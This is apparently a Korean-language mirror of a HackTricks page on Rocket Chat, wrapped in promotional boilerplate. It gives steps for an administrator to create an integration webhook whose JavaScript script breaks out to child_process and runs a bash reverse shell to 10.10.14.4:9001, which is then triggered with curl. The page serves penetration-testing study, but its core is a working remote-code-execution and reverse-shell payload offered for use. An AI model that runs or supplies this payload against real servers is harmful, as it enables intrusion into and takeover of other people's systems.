mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 07:01:09 +00:00
3.6 KiB
3.6 KiB
Rocket Chat
htARTE (HackTricks AWS Red Team Expert)에서 제로부터 영웅이 되기까지 AWS 해킹을 배워보세요!
HackTricks를 지원하는 다른 방법:
- 회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하려면 SUBSCRIPTION PLANS를 확인하세요!
- 공식 PEASS & HackTricks 스웨그를 얻으세요.
- The PEASS Family를 발견하세요. 독점적인 NFTs 컬렉션입니다.
- 💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @carlospolopm를 팔로우하세요.
- HackTricks와 HackTricks Cloud github 저장소에 PR을 제출하여 해킹 트릭을 공유하세요.
RCE
Rocket Chat 내에서 관리자 권한이 있는 경우 RCE를 얻을 수 있습니다.
- **
Integrations**로 이동하고 **New Integration**을 선택하고Incoming WebHook또는 **Outgoing WebHook**을 선택합니다. /admin/integrations/incoming
- 문서에 따르면 둘 다 데이터를 처리하기 위해 ES2015 / ECMAScript 6 (기본적으로 JavaScript)를 사용합니다. 따라서 rev shell for javascript을 얻어봅시다.
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- 웹훅을 구성하세요 (채널과 사용자 이름으로 게시물이 존재해야 함):
- 웹훅 스크립트를 구성하세요:
- 변경 사항을 저장하세요.
- 생성된 웹훅 URL을 가져오세요:
- curl을 사용하여 호출하면 리버스 셸을 받아야 합니다.
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!
HackTricks를 지원하는 다른 방법:
- 회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하려면 SUBSCRIPTION PLANS를 확인하세요!
- 공식 PEASS & HackTricks 스웨그를 얻으세요.
- The PEASS Family를 발견하세요. 독점적인 NFTs 컬렉션입니다.
- 💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @carlospolopm을 팔로우하세요.
- HackTricks와 HackTricks Cloud github 저장소에 PR을 제출하여 여러분의 해킹 기법을 공유하세요.